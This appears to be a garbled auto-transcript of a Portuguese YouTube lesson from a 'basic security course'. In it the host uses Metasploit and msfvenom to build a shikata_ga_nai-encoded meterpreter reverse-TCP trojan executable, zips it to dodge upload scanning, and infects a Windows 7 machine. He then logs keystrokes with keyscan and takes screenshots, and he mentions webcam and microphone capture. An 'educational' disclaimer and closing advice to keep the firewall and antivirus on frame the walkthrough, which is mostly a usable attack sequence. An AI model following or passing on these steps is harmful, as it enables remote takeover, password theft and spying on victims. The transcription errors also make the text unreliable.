Fala aí galera, obrigado aqui no canal Easy Nerd World, beleza, beleza, tudo bem pessoal? Hoje daremos início aqui ao nosso primeiro vídeo com relação ao novo curso trazido aqui pelo canal, que é o curso básico de segurança virtual, mostrando aí a vulnerabilidade do sistema operacional, que no caso aqui vamos utilizar o Windows. Então pessoal, o pré-inquisito para esse curso é a utilização do sistema operacional chamado Kali Linux, desenvolvido pela Linux, certo? E você não precisa ter instalado na sua máquina real, basta você ter instalado uma máquina virtual e fazer a instalação do Kali Linux. A primeira videoaula foi em relação à instalação do Kali Linux, passo a passo com como instalar e fazer o download do sistema operacional, que é totalmente gratuito, uma plataforma gratuita. Você roda aí com o sistema original sem pagar nada, certo? Então assistam ao primeiro vídeo que a gente vê a dúvida como fazer para iniciar o sistema da Linux. Está tudo explicado nesse primeiro vídeo. Aqui já vamos fazer o primeiro teste de segurança do Windows. Esse teste seria em relação a muitas modificações que foram feitas aí na segurança do Windows 10, como aí a consagração do Windows Defender, que é o próprio antivírus do sistema do Windows, que já veio no Windows 8 e agora consagrado no Windows 10, e também com relação ao farol do Windows. Então, pessoal, para a sua defesa pessoal, a primeira dica aqui é que tem que deixar o farol ligado, totalmente ativado e é importante que você tenha um antivírus atualizado e instalado no seu computador, mesmo que você utilize alguns programas, por exemplo, eu tenho direto esses problemas, que o antivírus acaba bloqueando alguns programas que não são vírus. Então, isso acontece normalmente, então se você tiver esse problema pontual, você vai e desliga o antivírus para utilizar aquele programa ou para instalar aquele programa. Mas depois é importante que você ligue ele novamente, para você não cair aí em situações onde pessoas mal intencionadas vão ter acesso às informações pessoais do seu computador, comprometendo aí a sua vida. Então, vamos iniciar aqui o processo. Lembrando a todos aí, eu vou utilizar aqui na máquina virtual, eu estou com o Carlinhos aqui instalado, atualizado, na minha máquina virtual, estou utilizando o DemoWalk Station 11, eu vou dar início aqui, está aqui a interface do sistema, e o sistema que vai ser testado vai ser o Windows 7, aqui. E o Windows 10 também, que está na minha máquina real. Essa é a minha máquina real, vou fazer o teste nas duas máquinas e vou mostrar a vulnerabilidade aqui. Por exemplo, hoje o teste vai ser com relação ao chamado hidrojan, que é um vírus muito antigo, que roda na internet até hoje, e o sistema Windows ainda continua vulnerável a esse vírus. Entendeu? Então, sendo esse sistema Windows 7 ou sendo ele o Windows 10, ambos os sistemas, o Windows continua vulnerável a esse vírus, que é muito antigo, e ele é, se você for infectado, a pessoa tem acesso remoto ao seu computador, ela pode fazer o que ela quiser com o seu computador, apagar, deletar, instalar, deletar, apagar tudo, entendeu? Ela pode fazer o que for. Gravar a sua webcam, gravar seu microfone. Então, vamos fazer aqui só para você ter ideia do que eu estou falando. Lembrando a todos, isso aqui é apenas um vídeo educativo, a gente não se responsabiliza pela utilização dessas informações para meios aí listos. Então, pessoal, apenas como educativo, vamos apresentar aqui as falas que o Windows ainda continua apresentando. Então, a gente está aqui com o sistema, a gente, primeira coisa, vamos abrir o terminal, clicando aqui, terminal, e a gente vai rodar o sistema MSF console. E aí, que digita MSF console. Dá Enter. Espera a interface do MetaSplot abrir. Está aqui aberta a interface, com 1577 esplots. Tudo aqui, gente, é uma infinidade de coisas que a gente pode fazer com esse MSF console. Então, a gente abriu aqui, ganhou o terminal. Ao mesmo tempo, vamos abrir o terminal, vem aqui em File, Open Terminal. Vamos digitar aqui a inicialização de um serviço que vai ser importante para esse tipo de ataque, que é o service, post, address, que é ele, start. Está Enter. Já iniciou o processo, podemos fechar aqui normalmente. E agora, vamos digitar aqui no MFCF console, vamos digitar aqui, vamos digitar aqui, use, espaço, multi, barra, render. Render. Daperta Enter. Aguardo. Agora estamos usando o erro Render. Vamos dar um Show Options aqui, ver o que a gente tem. Show Options. Qualquer dúvida que você tiver no espaço, você vai dar um Show Options, que ele te mostra o caminho que você tem que ir. Não temos nenhum álbum, né? Então vamos fazer o seguinte, vamos digitar o seguinte comando. Set. Payload. Windows. Barra. Windows. Barra. Barra. Preter. Barra. Reverse. Underline. Tcp. Aperta Enter. A gente está configurando aqui todo o sistema do Windows para gerar um vírus para a gente, gerar um Trojan, onde a gente vai usar esse vírus na outra máquina, que é o Windows 7 e Windows 10. Agora a gente já está usando aqui o meterpreter, reverse, tcp. Agora vamos dar um Show Options aqui. Show Options. Próximo passo que a gente tem que fazer utilizando esse tipo de Payload, a gente tem que colocar um IP Host, que é o Listing Adresa. Que IP é esse? É o IP onde você está fazendo o ataque, é onde vai vir todas as informações do computador que você está atacando. Então a gente tem que pegar esse IP, que é o IP da minha máquina que eu estou utilizando aqui, que é o do Calibinus. E eu, por exemplo, ah, não sei qual que é o IP, como que eu faço? A gente vem aqui, File, Open, Opa, File, Open Terminal, digita ifConfig. IfConfig. Aqui, o IP da sua máquina vai servir de host, onde vai vir as informações, é esse aqui, você vem e copia, pode fechar aqui o terminal, e vai digitar aqui, set, L, host, dá espaço e vai colar o IP. Fecha, dá um Enter. Beleza, vamos ver se deu certo, Show Options, Show Options. Ah lá, está aqui, agora já está configurado como o IP, aonde vai vir as informações. Certo? Listing Adresa, beleza. Aí você faria a porta também, mas a porta já está configurada aqui, L Port, 444, não preciso dela, não preciso de configurar essa porta. Certo? Aí o que você vai vir aqui, vai fazer? Vamos usar o MSFDNOM, que é o gerador do Trojan. Vai digitar MSFDNOM, D9. Espaço, traço H, dá Enter. Beleza. Aqui a gente agora vai pegar, mas aí só para não misturar, aqui vamos utilizar o terminal, vamos utilizar o D9 em outro terminal. Esse terminal aqui é onde vai vir as informações, vou utilizar ele para obter as informações do PC, do PC que eu vou invadir e eu vou abrir outro terminal para usar o VNOM. Vamos aqui em Open Terminal, digitar lá MSFDNOM, esse classe traço H. Vamos ter aquelas mesmas informações ali. Aí aqui nessa página, pessoal, vamos digitar o comando que vai gerar aí para a gente o Trojan, o Bios. A gente vai utilizar aqui o Payload, vamos utilizar também o Format, que é o Format X, né? .xx, vamos utilizar o Encoder para determinar aí a arquitetura, todo o sistema que a gente vai raquear, que a gente vai invadir. Vamos utilizar também a interação, Internexion, para interagir um computador com o outro. Então vamos lá. O código que a gente precisa digitar é TMSFDNOM, TMSFDNOM, espaço traço, P, que vai ser o Payload, qual o Payload que a gente está usando? Que é o espaço, Windows, Agora a gente vai colocar a porta, o IP da nossa máquina, que a gente usou pela hora, que é 192.168.34.118, agora a porta, que o próprio sistema já tinha gerado, L-Port, aqui a gente não pode esquecer do igual, pessoal, um igual, porque senão não funciona, igual a porta 4444, espaço, traço F, esse F é o formato do arquivo, que é o X, né, é XE, espaço, traço F, da arquitetura, que é o 32 bits, X86, barra, digitificada, chica chica underline g a underline nai espaço traço i que é interaction que vai ser a interação entre o meu sistema e o sistema que vai ser invadido 10 espaço sinal de maior e aqui a gente pode fazer o seguinte trazer esse vírus que vai ser gerado para a nossa área de trabalho para ser fácil de usar você vem e digita barra root barra desktop vai trazer desktop barra e aqui a gente dá o nome do vírus vou colocar easy easy variables .fxr ver se não tem nada errado aqui sfdenon payload a porta formato arquitetura beleza dá enter aqui já foi gerado aqui ó nosso vírus ai garoto viu pessoal editor ali já foi gerado nosso vírus e esse vírus ele vai ter que ser enviado o sistema que vai ser invadido né no caso a gente vai utilizar aqui primeiramente o windows 7 como exemplo então vamos fazer o seguinte eu vou enviar esse aqui vou fazer o upload rapidamente no media file fazer o upload aqui tá aqui ó easy virus easy virus pra não acusar vou cancelar e vou compactar ele senão vai acusar de usar media file depois vão me bloquear então vou compressar ele aqui ó transformar ele em zip novamente ó botão direito compress zip create aí criou pra mim aqui ó posso até deletar ele se quiser é beleza agora eu vou unpack ele ali não vai me bloquear não vai me bloquear dar um start aqui que é o jeito que eu tô fazendo pra poder levar pra uma máquina pra outra entendeu porque tem milhões de formas mais rápidas e mais fáceis eu tô fazendo isso aqui rapidinho vou fechar aqui né vou fechar aqui agora vamos na no nível 7 vamos entrar aqui no media file né na verdade eu já apertou aqui vamos na f5 atualizar a página vamos lá fazer o download fazer o download download aqui o desvibes fazer o download e eu tenho uma pasta compartilhada entre o meu Windows 10 e o Windows 7 na máquina Bicloaf vou colocar lá aqui ó programas essa pasta aqui é compartilhada vou colar aqui ou seja agora quando eu foco no Windows 7 e na pasta programas vai tá aqui o user e vários tá vendo agora agora o que eu preciso fazer eu preciso me infectar pessoal eu vou extrair esse arquivo eu tô mostrando uma maneira por exemplo você faz o download de um arquivo do sistema acho que tá abalando não tem antivírus ligado e aí se infecta assim legal você pode perder o seu computador tudo entendeu é tá aqui ó eu vou me infectar e automaticamente isso vai aparecer no terminal aqui ó a partir do momento que eu der o comando exploit agora ó uma vez que eu clico aqui automaticamente lá ele já ele já já é infectado lá entendeu é a partir do momento que eu cliquei lá ele já acusou aqui ó acusou aqui ó acusou o que? que a minha máquina que é esse P 118 tá conectado nesse P aqui ó P41.63 vamos confirmar lá se é esse aqui ó vamos entrar no campo de comando aqui vamos digitar IP config tá aqui ó P41.63 confirmado já estou dentro da máquina estou invadido já estou a máquina já estou já tenho controle da máquina se quiser eu venho aqui e digito help aqui é tudo que eu posso fazer com a máquina todos esses comandos aqui se eu digitar eu posso um muito um muito perigoso que é o o key scan esse aqui ó ele vai pegar tudo que a pessoa digita no teclado inclusive senha pode ser de banco pode ser de rede social entendeu? torna muito perigoso você vem aqui e digita o key scan status e dá enter e aí ele começa a digitar aí como é que faz ó tudo que você digitar aqui ó pega um bloco de nozes aqui ó pega um bloco de nozes aqui ó digitar você foi rarqueado seu computador me pertence certo? digitei aqui ó no Windows 7 agora eu vou lá no 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 ele tá aqui fazendo a a busca né tudo que ele tá aí eu dou um key ó key scan underline dump dá enter ó ó já trouxe a mensagem aqui pra gente ó você foi rarqueado seu computador me pertence e aí diversas outras coisas que você pode fazer pessoal vamos vamos ver outra coisa aqui ó pode terminar um processo da máquina da pessoa pode fazer muita coisa cara você pode tirar gravar o microfone você pode webcam chat você pode tirar uma foto da webcam cara entendeu? um monte de coisa que a gente pode tá fazendo aqui a partir do momento que você cai em uma dessas armadilhas aqui entendeu? pode desligar o computador você pode reiniciar muita coisa mesmo que a gente pode fazer aqui vou dar só mais um exemplo aqui pra gente finalizar esse vídeo vamos tirar uma foto da tela um screenshot vou apiar esse comando aqui onde ele tá aqui embaixo ó screenshot ele dá o caminho onde tá salvo essa vamos lá ó pra saber onde tá essa foto vamos aqui ó place computer root tá aqui a foto o que que é? foto é essa é a foto da área de trabalho que tá aqui ó vamos tirar a prova de novo vamos abrir uma outra coisa aqui ó vamos abrir propriedade do computador ó é é tá nessa página aqui vamos tirar outro screenshot agora fechamos aqui ó screenshot digita aí screenshot ó ó Não, só vou lá, vamos ver qual que é a foto que está lá agora. Aqui, olha. Está vendo aí, pessoal? Tirei foto, uma imagem da árvore de trabalho que o cara está utilizando lá naquele momento. Então, lembrando aí, pessoal, esse vídeo apenas vai mostrar as falhas que o Minus tem, que é para a gente sempre estar se protegendo, porque tem muita gente com pensamento malicioso aí na rede, buscando essas informações, roubando esses dados seus, senhas, bancos, entendeu? Então, fique muito atento, sempre deixe ligado o seu firewall do Minus, entendeu? Então, só você digita aqui, saber se está ligado o seu ou não, digita Firewall. Aqui, olha, vai aparecer esse símbolozinho aqui, você clica, aí, olha, TURN, está ligado. Você digita aqui, TURN Windows Firewall Home, desligar ou ligar o Windows Firewall. Você clica aqui, está vendo? Está tudo ligadinho, beleza. Antivírus também é importante deixar ligado, entendeu? Então, é isso aí, pessoal. Gostou do vídeo, dê um like. Se teve alguma dúvida sobre qualquer informação aqui sobre os códigos, deixe o seu comentário que eu vou responder. Se inscreva no nosso canal, ajude-nos a trazer mais informações e novidades a cada dia. Valeu, pessoal. Então, até o próximo vídeo aqui do curso básico de segurança virtual. Um abraço e valeu. Um abraço e valeu.